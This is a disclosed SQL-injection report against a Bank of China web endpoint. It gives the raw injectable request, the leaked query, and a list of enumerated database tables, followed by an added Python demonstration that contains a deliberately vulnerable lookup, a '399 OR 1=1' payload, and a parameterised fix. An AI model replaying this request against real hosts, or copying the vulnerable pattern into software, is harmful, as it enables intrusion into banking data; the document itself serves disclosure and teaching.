Vulnerability title: MySQL injection on a Bank of China (中国银行) site (exposes administrator password / large volume of user card-number data) | Vendor: 中国银行 | Author: Aasron | Submitted: 2016-05-05 10:24 | Disclosed: 2016-06-19 22:…
Vulnerability title
MySQL injection on a Bank of China (中国银行) site (exposes administrator password / large volume of user card-number data)
Vendor
中国银行 (Bank of China)
Author
Aasron
Submitted
2016-05-05 10:24
Disclosed
2016-06-19 22:10
Vulnerability type
SQL injection
Severity
High
Self-assessed rank
20
Status
Vendor confirmed
Tags
PHP + string-type injection, injection technique, MySQL
Vulnerability details
PUT /interFace/getAppUpdate.php HTTP/1.1
Host: open.boc.cn
Content-Type: application/json
Connection: close
Accept: application/json
User-Agent: ESchool/1.1 CFNetwork/758.3.15 Darwin/15.4.0
Accept-Language: zh-cn
Accept-Encoding: gzip,deflate
Content-Length: 29

{'clientid':'399','type':'1'}
Injection parameter: clientid (the leaked query below ends in `client_key=399'`, so the value is interpolated into the SQL unquoted and a single appended quote is enough to break the statement)
Normal response
{'clientkey':'399','version':'1.0.2','appversion':'177','appurl':'http:\/\/open.boc.cn\/apps\/appdownload\/41295','need_update':'0','new_function':'','appfilesize':'','incrementSize':''}
Error response (sending clientid=399' makes the application echo the failed query back to the client)
<b>MySQL server error report: Array
(
    [0] => Array
        (
            [message] => MySQL Query Error
        )
    [1] => Array
        (
            [sql] => SELECT goods_name,ios_file,app_version,goods_id,client_key as clientkey,need_update,new_function,category_ver as appversion FROM `ec`.`aps_goods` where client_key=399'
        )
    [2] => Array
        (
Failure when receiving data from the peer
| aps_affiliate_log |
| aps_agency |
| aps_apps |
| aps_apps_bak150321 |
| aps_apps_bak151205 |
| aps_apps_cat |
| aps_apps_relation |
| aps_area_region |
| aps_article |
| aps_article_cat |
| aps_article_cat_bak |
| aps_article_comment |
| aps_attribute |
| aps_auction_log |
| aps_auto_manage |
| aps_back_goods |
| aps_back_order |
| aps_bank_info |
| aps_banner |
| aps_bonus_type |
| aps_booking_goods |
| aps_brand |
| aps_card |
| aps_card_trans_audit |
| aps_cart |
| aps_cat_recommend |
| aps_category |
| aps_collect_goods |
| aps_comment |
| aps_crons |
| aps_custom_pads |
| aps_customs |
| aps_dcode |
| aps_delivery_goods |
| aps_delivery_order |
| aps_dic_h5_interface |
| aps_dic_paper_category |
| aps_dic_site_letter |
| aps_download_log |
| aps_email_list |
| aps_email_sendlist |
| aps_error_log |
| aps_exchange_goods |
| aps_failedlogin |
| aps_favourable_activity |
| aps_feedback |
| aps_friend_link |
| aps_general_bank |
| aps_general_interface |
| aps_goods |
| aps_goods_20141206 |
| aps_goods_activity |
| aps_goods_article |
| aps_goods_attr |
| aps_goods_bak150321 |
| aps_goods_bak151205 |
| aps_goods_cat |
| aps_goods_gallery |
| aps_goods_interface |
| aps_goods_interface_bak151205 |
| aps_goods_relation |
| aps_goods_type |
| aps_goods_whites |
| aps_group_goods |
| aps_interface |
| aps_interface0321 |
| aps_keywords |
| aps_link_goods |
| aps_log_conf |
| aps_log_data |
| aps_log_goods_download |
| aps_mail_templates |
| aps_manage_ip |
| aps_match_goods |
| aps_matchor |
| aps_member_price |
Failure when receiving data from the peer
| aps_suppliers |
| aps_tag |
| aps_template |
| aps_topic |
| aps_user_account |
| aps_user_address |
| aps_user_app |
| aps_user_bonus |
| aps_user_feed |
| aps_user_pictures |
| aps_user_pictures_copy |
| aps_user_rank |
| aps_user_test_account |
| aps_user_test_card |
| aps_user_trans_audit |
| aps_users |
| aps_users_bak |
| aps_users_bak150321 |
| aps_users_bak150321_copy |
| aps_users_copy |
| aps_validate_code |
| aps_validate_code_copy |
| aps_virtual_card |
| aps_volume_price |
| aps_vote |
| aps_vote_log |
| aps_vote_option |
| aps_wholesale |
+ ------------------------------- +

To protect users, no deeper testing was done.
Fix suggestion:
Filter the parameter.
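The following is an added example, not code from the report or from open.boc.cn. It reconstructs the injection pattern the leaked query reveals and places the fix beside it. Assumptions: the site's PHP pasted clientid straight into the statement (the leaked SQL ends in `client_key=399'`, i.e. the value was unquoted); an in-memory SQLite table named aps_goods stands in for MySQL `ec`.`aps_goods`; the rows, the helper names and the `399 OR 1=1` payload are constructed for illustration. The fix does two things "filter" alone does not spell out: it enforces the integer type the column expects and binds the value as a query parameter.

```python
"""Added example (not code from the WooYun report or from open.boc.cn):
reproduces the numeric SQL injection behind /interFace/getAppUpdate.php and
shows the fix. Assumptions: the site's PHP concatenated clientid straight
into the query (the leaked SQL ends in `client_key=399'`, i.e. unquoted);
an in-memory SQLite table stands in for MySQL `ec`.`aps_goods`; the rows
below are constructed sample data."""
import re
import sqlite3

# Constructed sample rows; column names follow the SELECT leaked in the
# error message. Row 1 mirrors the report's normal response for clientid 399.
SAMPLE_ROWS = [
    (41295, "ESchool", "eschool.ipa", "1.0.2", 399, 0, "", "177"),
    (41296, "OtherApp", "other.ipa", "2.3.0", 400, 1, "new feature", "180"),
    (41297, "ThirdApp", "third.ipa", "0.9.1", 401, 0, "", "150"),
]

SELECT = ("SELECT goods_name,ios_file,app_version,goods_id,client_key as clientkey,"
          "need_update,new_function,category_ver as appversion FROM aps_goods")


def make_db():
    """Build the stand-in aps_goods table in memory (SQLite, not MySQL)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE aps_goods (goods_id INTEGER, goods_name TEXT, ios_file TEXT,"
        " app_version TEXT, client_key INTEGER, need_update INTEGER,"
        " new_function TEXT, category_ver TEXT)")
    conn.executemany("INSERT INTO aps_goods VALUES (?,?,?,?,?,?,?,?)", SAMPLE_ROWS)
    return conn


def parse_body(body):
    """Parse the client's single-quoted pseudo-JSON body, e.g.
    {'clientid':'399','type':'1'}, into a dict (json.loads rejects it)."""
    return dict(re.findall(r"'([^']*)'\s*:\s*'([^']*)'", body))


def vulnerable_lookup(conn, clientid):
    """Deliberately vulnerable: the value is interpolated unquoted, exactly
    as the leaked `where client_key=399'` shows, so any SQL appended to a
    number is executed."""
    return conn.execute(f"{SELECT} where client_key={clientid}").fetchall()


def safe_lookup(conn, clientid):
    """Fixed version: enforce the integer type the column expects, then bind
    the value as a query parameter instead of pasting it into the SQL."""
    if not re.fullmatch(r"[0-9]{1,10}", str(clientid)):
        raise ValueError("clientid must be a decimal integer")
    return conn.execute(f"{SELECT} where client_key=?", (int(clientid),)).fetchall()


def vulnerable_raises(conn, clientid):
    """True when the vulnerable path hits a database error for this input;
    with error display enabled, that is what leaked the query text."""
    try:
        vulnerable_lookup(conn, clientid)
    except sqlite3.Error:
        return True
    return False


def safe_rejects(conn, clientid):
    """True when the fixed path refuses the input before any SQL runs."""
    try:
        safe_lookup(conn, clientid)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    conn = make_db()
    normal = parse_body("{'clientid':'399','type':'1'}")["clientid"]
    boolean = parse_body("{'clientid':'399 OR 1=1','type':'1'}")["clientid"]
    print("normal lookup:", len(vulnerable_lookup(conn, normal)), "row(s)")
    print("399 OR 1=1 via vulnerable code:", len(vulnerable_lookup(conn, boolean)), "row(s)")
    print("399' via vulnerable code raises a DB error:", vulnerable_raises(conn, "399'"))
    print("399 OR 1=1 via fixed code rejected:", safe_rejects(conn, boolean))
```

Because the value sits in a numeric context, no quote is needed to inject: `399 OR 1=1` returns every row through the vulnerable path, while `399'` only produces the syntax error seen in the report. Error display in the production application should be turned off as well, since the echoed query is what handed the attacker the database and table names.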
Copyright notice: please credit the source, Aasron @ 乌云 (WooYun)